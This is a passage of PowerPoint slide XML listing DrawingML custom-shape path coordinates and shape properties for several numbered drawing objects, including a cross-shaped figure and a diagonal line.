                    <a:pt x="136969" y="770496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269864" y="815125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365907" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273303" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268971" y="797478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271177" y="797080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173247" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148505" y="755884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147429" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="746667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190689" y="746667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="734812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="720422"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="271177" y="797080"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="268971" y="797478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273303" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271177" y="797080"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="561588" y="744676"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="271177" y="797080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273303" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365907" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="759325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="744676"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="148505" y="755884"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154471" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="757887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148505" y="755884"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="757887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154471" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173247" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="757887"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="755884"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="148505" y="755884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="757887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755884"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="746667"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147429" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="753863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="746667"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="753863"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147429" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="753863"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="190689" y="746667"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154471" y="746667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="753863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190689" y="746667"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="566236" y="743837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="744676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568057" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567412" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="579090" y="743376"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="568792" y="743376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="743376"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="561588" y="742183"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="744676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="742183"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="567017" y="743696"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567412" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567117" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="568792" y="743376"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567412" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568057" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568792" y="743376"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="561588" y="735999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="742183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="735999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="579090" y="735999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="735999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568792" y="743376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="743376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="735999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="493351" y="699301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441092" y="699301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446012" y="699575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443507" y="700160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="742183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="735999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="735999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="729813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493351" y="699301"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="676251" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="119816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="717724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34006" y="735237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129488" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39387" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33858" y="717464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36763" y="716949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27885" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12753" y="704584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="704584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10275" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="127162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58959" y="127162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674458" y="18107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672182" y="17221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="17221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="13726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676251" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="239902" y="719021"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232850" y="720422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="719021"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="250353" y="719021"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239902" y="719021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="719021"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="250353" y="689517"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232850" y="689517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243128" y="698143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="699966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="720422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="719021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="719021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="689517"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="36763" y="716949"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33858" y="717464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39387" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36763" y="716949"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="250353" y="679062"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36763" y="716949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39387" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129488" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="699966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="689517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="689517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="679062"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="12753" y="704584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17502" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="707029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12753" y="704584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="707029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17502" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27885" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="707029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="693996" y="599138"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412439" y="650198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412439" y="707419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443507" y="700160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441092" y="699301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493351" y="699301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485128" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419206" y="687840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="685334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422757" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="657513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470321" y="657513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="613774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="599138"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="704584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12753" y="704584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="707029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="704584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="441092" y="699301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="443507" y="700160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446012" y="699575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441092" y="699301"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="232850" y="689517"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232850" y="699966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243128" y="698143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="689517"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="429941" y="685334"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="419206" y="687840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="685334"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="444531" y="681927"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429941" y="685334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485128" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444531" y="681927"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="429941" y="657513"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422757" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="664836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="657513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="429941" y="664836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422757" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="664836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="470321" y="657513"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429941" y="657513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="664836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470321" y="657513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="701190" y="597833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="599138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701190" y="597833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="711499" y="597833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="701190" y="597833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="597833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="693996" y="25716"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="599138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701190" y="597833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="597833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699577" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="25716"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="127162"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10275" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="134507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="127162"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="134507"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10275" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="134507"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="58959" y="127162"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17502" y="127162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="134507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58959" y="127162"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="693996" y="19720"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="25716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699577" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="19720"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="711499" y="19720"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="19720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699577" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="19720"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="711499" y="17221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="672182" y="17221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676880" y="17678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674458" y="18107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="25716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="19720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="19720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="17221"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="672182" y="17221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674458" y="18107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676880" y="17678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672182" y="17221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63" name="object 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4295921C-1ED4-3015-2BEA-73B9F0544813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2508" y="3847360"/>
              <a:ext cx="526589" cy="537970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="object 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17218F1E-3C99-3DC4-51C0-B775DE7BF5C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2589906" y="3421870"/>
              <a:ext cx="2054860" cy="878840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2054860" h="878839">
                  <a:moveTo>
                    <a:pt x="2049737" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="867154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4754" y="878391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054492" y="11236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2049737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5" name="object 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABCF00A-6D4E-BAC9-0827-49D8522C67E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4890769" y="2798826"/>
              <a:ext cx="444500" cy="445134"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="444500" h="445135">
                  <a:moveTo>
                    <a:pt x="336676" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="222250" y="114681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107822" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="107568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114680" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="337438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107822" y="445007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="330326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336676" y="445007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444500" y="337438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329818" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444500" y="107568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336676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6" name="object 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F48CC2-3940-C81F-E1AC-69E17E12193F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4890769" y="2798826"/>
              <a:ext cx="444500" cy="445134"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="444500" h="445135">
                  <a:moveTo>
                    <a:pt x="0" y="107568"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="107822" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="114681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336676" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444500" y="107568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329818" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444500" y="337438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336676" y="445007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="330326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107822" y="445007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="337438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114680" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="107568"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25907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5" name="object 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DDEDDBA-7551-4484-7BAA-13C727E6F9FB}"/>
              </a:ext>
            </a:extLst>
